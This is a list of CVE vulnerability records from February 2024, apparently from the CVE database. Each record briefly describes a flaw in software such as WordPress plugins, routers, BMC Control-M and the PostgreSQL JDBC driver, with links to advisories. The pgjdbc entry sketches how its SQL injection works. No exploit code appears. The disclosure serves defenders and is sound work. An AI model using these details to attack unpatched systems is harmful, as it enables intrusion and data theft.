CVE 2024 1661 Candidate A vulnerability classified as problematic was found in Totolink X6000R 9.4.0cu.852_B20230719. Affected by this vulnerability is an unknown functionality of the file /etc/shadow. The manipulation leads to hard-coded credentials. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254179. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254179 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254179 | MISC:VDB-254179 | Totolink X6000R shadow hard-coded credentials | URL:https://vuldb.com/?id.254179 | MISC:https://github.com/WoodManGitHub/MyCVEs/blob/main/2024-Totolink/X6000R-Hardcoded-Password.md | URL:https://github.com/WoodManGitHub/MyCVEs/blob/main/2024-Totolink/X6000R-Hardcoded-Password.md Assigned (20240220)
CVE 2024 1658 Candidate The Grid Shortcodes WordPress plugin before 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks MISC:https://wpscan.com/vulnerability/9489925e-5a47-4608-90a2-0139c5e1c43c/ | URL:https://wpscan.com/vulnerability/9489925e-5a47-4608-90a2-0139c5e1c43c/ Assigned (20240220)
CVE 2024 1654 Candidate This vulnerability potentially allows unauthorized write operations which may lead to remote code execution. An attacker must already have authenticated admin access and knowledge of both an internal system identifier and details of another valid user to exploit this. MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 | URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 Assigned (20240220)
CVE 2024 1653 Candidate The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxUpdateFolderPosition in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the folder position of categories as well as update the metadata of other taxonomies. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/45badd20-1ba8-44be-8a7c-2ce21261e208?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/45badd20-1ba8-44be-8a7c-2ce21261e208?source=cve Assigned (20240219)
CVE 2024 1652 Candidate The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxClearCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to clear categories. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/acccc6ae-553d-4ed5-8ba9-06a9061d725c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/acccc6ae-553d-4ed5-8ba9-06a9061d725c?source=cve Assigned (20240219)
CVE 2024 1651 Candidate Torrentpier version 2.4.1 allows executing arbitrary commands on the server. This is possible because the application is vulnerable to insecure deserialization. MISC:https://fluidattacks.com/advisories/xavi/ | URL:https://fluidattacks.com/advisories/xavi/ | MISC:https://github.com/torrentpier/torrentpier | URL:https://github.com/torrentpier/torrentpier Assigned (20240219)
CVE 2024 1650 Candidate The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxRenameCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to rename categories. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f9a3dc87-5309-41fe-bfc3-60b5878b6c57?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f9a3dc87-5309-41fe-bfc3-60b5878b6c57?source=cve Assigned (20240219)
CVE 2024 1649 Candidate The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxDeleteCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete categories. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c63ddc62-a4f1-4da4-a65e-4573369d6c30?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c63ddc62-a4f1-4da4-a65e-4573369d6c30?source=cve Assigned (20240219)
CVE 2024 1648 Candidate electron-pdf version 20.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the HTML content entered by the user. MISC:https://fluidattacks.com/advisories/drake | URL:https://fluidattacks.com/advisories/drake | MISC:https://www.npmjs.com/package/electron-pdf/ | URL:https://www.npmjs.com/package/electron-pdf/ Assigned (20240219)
CVE 2024 1647 Candidate Pyhtml2pdf version 0.0.6 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the HTML content entered by the user. MISC:https://fluidattacks.com/advisories/oliver/ | URL:https://fluidattacks.com/advisories/oliver/ | MISC:https://pypi.org/project/pyhtml2pdf/ | URL:https://pypi.org/project/pyhtml2pdf/ Assigned (20240219)
CVE 2024 1645 Candidate The Mollie Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportRegistrations function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to export payment data collected by this plugin. MISC:https://plugins.trac.wordpress.org/browser/mollie-forms/trunk/classes/Admin.php#L904 | URL:https://plugins.trac.wordpress.org/browser/mollie-forms/trunk/classes/Admin.php#L904 | MISC:https://plugins.trac.wordpress.org/changeset/3046896/mollie-forms/trunk/classes/Admin.php | URL:https://plugins.trac.wordpress.org/changeset/3046896/mollie-forms/trunk/classes/Admin.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/353c244f-6d5d-47d6-988e-33da722a02f9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/353c244f-6d5d-47d6-988e-33da722a02f9?source=cve Assigned (20240219)
CVE 2024 1644 Candidate Suite CRM version 7.14.2 allows including local php files. This is possible because the application is vulnerable to LFI. MISC:https://fluidattacks.com/advisories/silva/ | URL:https://fluidattacks.com/advisories/silva/ | MISC:https://github.com/salesagility/SuiteCRM/ | URL:https://github.com/salesagility/SuiteCRM/ Assigned (20240219)
CVE 2024 1642 Candidate The MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.0.1. This is due to missing or incorrect nonce validation on the 'posting_bulk' function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/mainwp/tags/4.6.0.1/pages/page-mainwp-post-page-handler.php | URL:https://plugins.trac.wordpress.org/browser/mainwp/tags/4.6.0.1/pages/page-mainwp-post-page-handler.php | MISC:https://plugins.trac.wordpress.org/changeset/3042125/mainwp/trunk/pages/page-mainwp-post-page-handler.php?old=3017011&old_path=mainwp/trunk/pages/page-mainwp-post-page-handler.php | URL:https://plugins.trac.wordpress.org/changeset/3042125/mainwp/trunk/pages/page-mainwp-post-page-handler.php?old=3017011&old_path=mainwp/trunk/pages/page-mainwp-post-page-handler.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c2d9569-a551-46f5-8581-464b9f35b71c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c2d9569-a551-46f5-8581-464b9f35b71c?source=cve Assigned (20240219)
CVE 2024 1640 Candidate The Contact Form Builder Plugin: Multi Step Contact Form, Payment Form, Custom Contact Form Plugin by Bit Form plugin for WordPress is vulnerable to unauthorized modification of data due to a insufficient user validation on the bitforms_update_form_entry AJAX action in all versions up to, and including, 2.10.1. This makes it possible for unauthenticated attackers to modify form submissions. MISC:https://plugins.trac.wordpress.org/changeset/3048523/bit-form/trunk/includes/Frontend/Ajax/FrontendAjax.php | URL:https://plugins.trac.wordpress.org/changeset/3048523/bit-form/trunk/includes/Frontend/Ajax/FrontendAjax.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/49ed7d6a-4a65-4efc-90e5-ffa5470d4011?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/49ed7d6a-4a65-4efc-90e5-ffa5470d4011?source=cve Assigned (20240219)
CVE 2024 1638 Candidate The documentation specifies that the BT_GATT_PERM_READ_LESC and BT_GATT_PERM_WRITE_LESC defines for a Bluetooth characteristic: Attribute read/write permission with LE Secure Connection encryption. If set, requires that LE Secure Connections is used for read/write access, however this is only true when it is combined with other permissions, namely BT_GATT_PERM_READ_ENCRYPT/BT_GATT_PERM_READ_AUTHEN (for read) or BT_GATT_PERM_WRITE_ENCRYPT/BT_GATT_PERM_WRITE_AUTHEN (for write), if these additional permissions are not set (even in secure connections only mode) then the stack does not perform any permission checks on these characteristics and they can be freely written/read. MISC:https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p6f3-f63q-5mc2 | URL:https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-p6f3-f63q-5mc2 Assigned (20240219)
CVE 2024 1636 Candidate Potential Cross-Site Scripting (XSS) in the page editing area. MISC:https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerabilities-CVE-2024-1632-and-CVE-2024-1636-February-2024 | URL:https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerabilities-CVE-2024-1632-and-CVE-2024-1636-February-2024 | MISC:https://www.progress.com/sitefinity-cms | URL:https://www.progress.com/sitefinity-cms Assigned (20240219)
CVE 2024 1635 Candidate A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. At HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak. CONFIRM:https://security.netapp.com/advisory/ntap-20240322-0007/ | MISC:RHBZ#2264928 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264928 | MISC:https://access.redhat.com/security/cve/CVE-2024-1635 | URL:https://access.redhat.com/security/cve/CVE-2024-1635 Assigned (20240219)
CVE 2024 1633 Candidate During the secure boot, bl2 (the second stage of the bootloader) loops over images defined in the table “bl2_mem_params_descs”. For each image, the bl2 reads the image length and destination from the image’s certificate. Because of the way of reading from the image, which base on 32-bit unsigned integer value, it can result to an integer overflow. An attacker can bypass memory range restriction and write data out of buffer bounds, which could result in bypass of secure boot. Affected git version from c2f286820471ed276c57e603762bd831873e5a17 until (not MISC:https://asrg.io/security-advisories/CVE-2024-1633/ | URL:https://asrg.io/security-advisories/CVE-2024-1633/ Assigned (20240219)
CVE 2024 1632 Candidate Low-privileged users with access to the Sitefinity backend may obtain sensitive information from the site's administrative area. MISC:https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerabilities-CVE-2024-1632-and-CVE-2024-1636-February-2024 | URL:https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerabilities-CVE-2024-1632-and-CVE-2024-1636-February-2024 | MISC:https://www.progress.com/sitefinity-cms | URL:https://www.progress.com/sitefinity-cms Assigned (20240219)
CVE 2024 1631 Candidate Impact: The library offers a function to generate an ed25519 key pair via Ed25519KeyIdentity.generate with an optional param to provide a 32 byte seed value, which will then be used as the secret key. When no seed value is provided, it is expected that the library generates the secret key using secure randomness. However, a recent change broke this guarantee and uses an insecure seed for key pair generation. Since the private key of this identity (535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe) is compromised, one could lose funds associated with the principal on ledgers or lose access to a canister where this principal is the controller. MISC:https://agent-js.icp.xyz/identity/index.html | URL:https://agent-js.icp.xyz/identity/index.html | MISC:https://github.com/dfinity/agent-js | URL:https://github.com/dfinity/agent-js | MISC:https://github.com/dfinity/agent-js/pull/851 | URL:https://github.com/dfinity/agent-js/pull/851 | MISC:https://github.com/dfinity/agent-js/security/advisories/GHSA-c9vv-fhgv-cjc3 | URL:https://github.com/dfinity/agent-js/security/advisories/GHSA-c9vv-fhgv-cjc3 | MISC:https://www.npmjs.com/package/@dfinity/identity/v/1.0.1 | URL:https://www.npmjs.com/package/@dfinity/identity/v/1.0.1 Assigned (20240219)
CVE 2024 1624 Candidate An OS Command Injection vulnerability affecting documentation server on 3DEXPERIENCE from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x, SIMULIA Abaqus from Release 2022 through Release 2024, SIMULIA Isight from Release 2022 through Release 2024 and CATIA Composer from Release R2023 through Release R2024. A specially crafted HTTP request can lead to arbitrary command execution. MISC:https://www.3ds.com/vulnerability/advisories | URL:https://www.3ds.com/vulnerability/advisories Assigned (20240219)
CVE 2024 1623 Candidate Insufficient session timeout vulnerability in the FAST3686 V2 Vodafone router from Sagemcom. This vulnerability could allow a local attacker to access the administration panel without requiring login credentials. This vulnerability is possible because the 'Login.asp and logout.asp' files do not handle session details correctly. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/insufficient-session-timeout-vulnerability-sagemcom-router | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/insufficient-session-timeout-vulnerability-sagemcom-router Assigned (20240219)
CVE 2024 1622 Candidate Due to a mistake in error checking, Routinator will terminate when an incoming RTR connection is reset by the peer too quickly after opening. FEDORA:FEDORA-2024-1f5908a311 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K52QRRYBHLP73RAS3CGOPBWYT7EZVP6O/ | FEDORA:FEDORA-2024-28a151028a | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N2N3N3SNBHSH7GN3JOLR7YUF5FCTQQ5O/ | FEDORA:FEDORA-2024-d20ff4a09b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4HPRUIPAI2BBDGFVLN733JLIUJWLEBLF/ | MISC:https://www.nlnetlabs.nl/downloads/routinator/CVE-2024-1622.txt | URL:https://www.nlnetlabs.nl/downloads/routinator/CVE-2024-1622.txt Assigned (20240219)
CVE 2024 1619 Candidate Kaspersky has fixed a security issue in the Kaspersky Security 8.0 for Linux Mail Server. The issue was that an attacker could potentially force an administrator to click on a malicious link to perform unauthorized actions. MISC:Advisory issued on February 1, 2024 | URL:https://support.kaspersky.com/vulnerability/list-of-advisories/12430#010224 Assigned (20240219)
CVE 2024 1618 Candidate A search path or unquoted item vulnerability in Faronics Deep Freeze Server Standard, which affects versions 8.30.020.4627 and earlier. This vulnerability affects the DFServ.exe file. An attacker with local user privileges could exploit this vulnerability to replace the legitimate DFServ.exe service executable with a malicious file of the same name and located in a directory that has a higher priority than the legitimate directory. Thus, when the service starts, it will run the malicious file instead of the legitimate executable, allowing the attacker to execute arbitrary code, gain unauthorized access to the compromised system or stop the service from running. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/unquoted-item-or-search-path-vulnerability-faronics-deep-freeze-server | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/unquoted-item-or-search-path-vulnerability-faronics-deep-freeze-server Assigned (20240219)
CVE 2024 1608 Candidate In OPPO Usercenter Credit SDK, there's a possible escalation of privilege due to loose permission check, This could lead to application internal information leak w/o user interaction. MISC:https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-1759867611954552832 | URL:https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-1759867611954552832 Assigned (20240219)
CVE 2024 1606 Candidate Lack of input sanitization in BMC Control-M branches 9.0.20 and 9.0.21 allows logged-in users for manipulation of generated web pages via injection of HTML code. This might lead to a successful phishing attack for example by tricking users into using a hyperlink pointing to a website controlled by an attacker. Fix for 9.0.20 branch was released in version 9.0.20.238. Fix for 9.0.21 branch was released in version 9.0.21.200. MISC:https://cert.pl/en/posts/2024/03/CVE-2024-1604 | URL:https://cert.pl/en/posts/2024/03/CVE-2024-1604 | MISC:https://cert.pl/posts/2024/03/CVE-2024-1604 | URL:https://cert.pl/posts/2024/03/CVE-2024-1604 | MISC:https://www.bmc.com/it-solutions/control-m.html | URL:https://www.bmc.com/it-solutions/control-m.html Assigned (20240218)
CVE 2024 1605 Candidate BMC Control-M branches 9.0.20 and 9.0.21 upon user login load all Dynamic Link Libraries (DLL) from a directory that grants Write and Read permissions to all users. Leveraging it leads to loading of a potentially malicious libraries, which will execute with the application's privileges. Fix for 9.0.20 branch was released in version 9.0.20.238. Fix for 9.0.21 branch was released in version 9.0.21.201. MISC:https://cert.pl/en/posts/2024/03/CVE-2024-1604 | URL:https://cert.pl/en/posts/2024/03/CVE-2024-1604 | MISC:https://cert.pl/posts/2024/03/CVE-2024-1604 | URL:https://cert.pl/posts/2024/03/CVE-2024-1604 | MISC:https://www.bmc.com/it-solutions/control-m.html | URL:https://www.bmc.com/it-solutions/control-m.html Assigned (20240218)
CVE 2024 1604 Candidate Improper authorization in the report management and creation module of BMC Control-M branches 9.0.20 and 9.0.21 allows logged-in users to read and make unauthorized changes to any reports available within the application, even without proper permissions. The attacker must know the unique identifier of the report they want to manipulate. Fix for 9.0.20 branch was released in version 9.0.20.238. Fix for 9.0.21 branch was released in version 9.0.21.201. MISC:https://cert.pl/en/posts/2024/03/CVE-2024-1604 | URL:https://cert.pl/en/posts/2024/03/CVE-2024-1604 | MISC:https://cert.pl/posts/2024/03/CVE-2024-1604 | URL:https://cert.pl/posts/2024/03/CVE-2024-1604 | MISC:https://www.bmc.com/it-solutions/control-m.html | URL:https://www.bmc.com/it-solutions/control-m.html Assigned (20240218)
CVE 2024 1603 Candidate paddlepaddle/paddle 2.6.0 allows arbitrary file read via paddle.vision.ops.read_file. MISC:https://huntr.com/bounties/7739eced-73a3-4a96-afcd-9c753c55929e | URL:https://huntr.com/bounties/7739eced-73a3-4a96-afcd-9c753c55929e Assigned (20240218)
CVE 2024 1597 Candidate pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected. FEDORA:FEDORA-2024-ed884c3203 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TZQTSMESZD2RJ5XBPSXH3TIQVUW5DIUU/ | MISC:https://www.enterprisedb.com/docs/jdbc_connector/latest/01_jdbc_rel_notes/ | MISC:https://www.enterprisedb.com/docs/security/assessments/cve-2024-1597/ | MISC:https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56 | URL:https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56 Assigned (20240216)
CVE 2024 1595 Candidate Delta Electronics CNCSoft-B DOPSoft prior to v4.0.0.82 insecurely loads libraries, which may allow an attacker to use DLL hijacking and take over the system where the software is installed. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-053-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-053-01 Assigned (20240216)
CVE 2024 1592 Candidate The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5.6. This is due to missing or incorrect nonce validation on the process_delete function in class-DNSMPD.php. This makes it possible for unauthenticated attackers to delete GDPR data requests via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041903%40complianz-gdpr&old=3009228%40complianz-gdpr&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041903%40complianz-gdpr&old=3009228%40complianz-gdpr&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6b524fc5-4beb-49f6-bafa-c788c6d1d78c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6b524fc5-4beb-49f6-bafa-c788c6d1d78c?source=cve Assigned (20240216)
CVE 2024 1591 Candidate Prior to version 24.1, a local authenticated attacker can view Sysvol when Privilege Management for Windows is configured to use a GPO policy. This allows them to view the policy and potentially find configuration issues. MISC:https://www.beyondtrust.com/trust-center/security-advisories/bt24-02 | URL:https://www.beyondtrust.com/trust-center/security-advisories/bt24-02 Assigned (20240216)
CVE 2024 1590 Candidate The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button Widget in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3039750%40pagelayer&new=3039750%40pagelayer&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3039750%40pagelayer&new=3039750%40pagelayer&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e635dfb3-002d-4197-b14a-0136a1990a75?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e635dfb3-002d-4197-b14a-0136a1990a75?source=cve Assigned (20240216)
CVE 2024 1586 Candidate The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom schema in all versions up to, and including, 1.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default the required authentication level is admin, but administrators have the ability to assign role based access to users as low as subscriber. MISC:https://plugins.trac.wordpress.org/changeset?old_path=/schema-and-structured-data-for-wp/tags/1.26&old=3038020&new_path=/schema-and-structured-data-for-wp/tags/1.27&new=3038020&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/schema-and-structured-data-for-wp/tags/1.26&old=3038020&new_path=/schema-and-structured-data-for-wp/tags/1.27&new=3038020&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7e7e6ea7-4e0b-4d8a-9306-45b55d41fbb5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7e7e6ea7-4e0b-4d8a-9306-45b55d41fbb5?source=cve Assigned (20240216)
CVE 2024 1585 Candidate The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/metform/trunk/utils/util.php#L555 | URL:https://plugins.trac.wordpress.org/browser/metform/trunk/utils/util.php#L555 | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/metform/tags/3.8.3&old=3047398&new_path=/metform/tags/3.8.4&new=3047398&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/metform/tags/3.8.3&old=3047398&new_path=/metform/tags/3.8.4&new=3047398&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/342d6941-6987-4756-b554-1699128b9108?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/342d6941-6987-4756-b554-1699128b9108?source=cve Assigned (20240216)
CVE 2024 1582 Candidate The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpgmza' shortcode in all versions up to, and including, 9.0.32 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3045434/wp-google-maps/trunk/includes/class.shortcodes.php | URL:https://plugins.trac.wordpress.org/changeset/3045434/wp-google-maps/trunk/includes/class.shortcodes.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/67f405d0-7139-4b5c-ab3c-cd1de5592866?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/67f405d0-7139-4b5c-ab3c-cd1de5592866?source=cve Assigned (20240216)
CVE 2024 1580 Candidate An integer overflow in dav1d AV1 decoder that can occur when decoding videos with large frame size. This can lead to memory corruption within the AV1 decoder. We recommend upgrading past version 1.4.0 of dav1d. CONFIRM:https://support.apple.com/kb/HT214093 | CONFIRM:https://support.apple.com/kb/HT214094 | CONFIRM:https://support.apple.com/kb/HT214095 | CONFIRM:https://support.apple.com/kb/HT214096 | CONFIRM:https://support.apple.com/kb/HT214097 | CONFIRM:https://support.apple.com/kb/HT214098 | FEDORA:FEDORA-2024-12fcc689ac | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5EPMUNDMEBGESOJ2ZNCWYEAYOOEKNWOO/ | MISC:https://code.videolan.org/videolan/dav1d/-/blob/master/NEWS | URL:https://code.videolan.org/videolan/dav1d/-/blob/master/NEWS | MISC:https://code.videolan.org/videolan/dav1d/-/releases/1.4.0 | URL:https://code.videolan.org/videolan/dav1d/-/releases/1.4.0 Assigned (20240216)
CVE 2024 1570 Candidate The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's login-password shortcode in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/src/ShortcodeParser/Builder/LoginFormBuilder.php#L99 | URL:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/src/ShortcodeParser/Builder/LoginFormBuilder.php#L99 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/46d4d573-3845-4d20-8a48-a2f28850383c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/46d4d573-3845-4d20-8a48-a2f28850383c?source=cve Assigned (20240215)
CVE 2024 1568 Candidate The Seraphinite Accelerator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.20.52 via the OnAdminApi_HtmlCheck function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. MISC:https://plugins.trac.wordpress.org/changeset/3040707/seraphinite-accelerator | URL:https://plugins.trac.wordpress.org/changeset/3040707/seraphinite-accelerator | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/07287a85-df00-408a-8b02-978fd3116155?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/07287a85-df00-408a-8b02-978fd3116155?source=cve Assigned (20240215)
CVE 2024 1566 Candidate The Redirects plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save function in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to change redirects created with this plugin. This could lead to undesired redirection to phishing sites or malicious web pages. MISC:https://plugins.trac.wordpress.org/browser/redirects/trunk/index.php#L118 | URL:https://plugins.trac.wordpress.org/browser/redirects/trunk/index.php#L118 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7c6be7f2-5526-4fba-9fe0-003b8460c926?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7c6be7f2-5526-4fba-9fe0-003b8460c926?source=cve Assigned (20240215)
CVE 2024 1564 Candidate The wp-schema-pro WordPress plugin before 2.7.16 does not validate post access allowing a contributor user to access custom fields on any post regardless of post type or status via a shortcode MISC:https://wpscan.com/vulnerability/ecb1e36f-9c6e-4754-8878-03c97194644d/ | URL:https://wpscan.com/vulnerability/ecb1e36f-9c6e-4754-8878-03c97194644d/ Assigned (20240215)
CVE 2024 1563 Candidate An attacker could have executed unauthorized scripts on top origin sites using a JavaScript URI when opening an external URL with a custom Firefox scheme and a timeout race condition. This vulnerability affects Focus for iOS < 122. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1863831 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1863831 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-09/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-09/ Assigned (20240215)
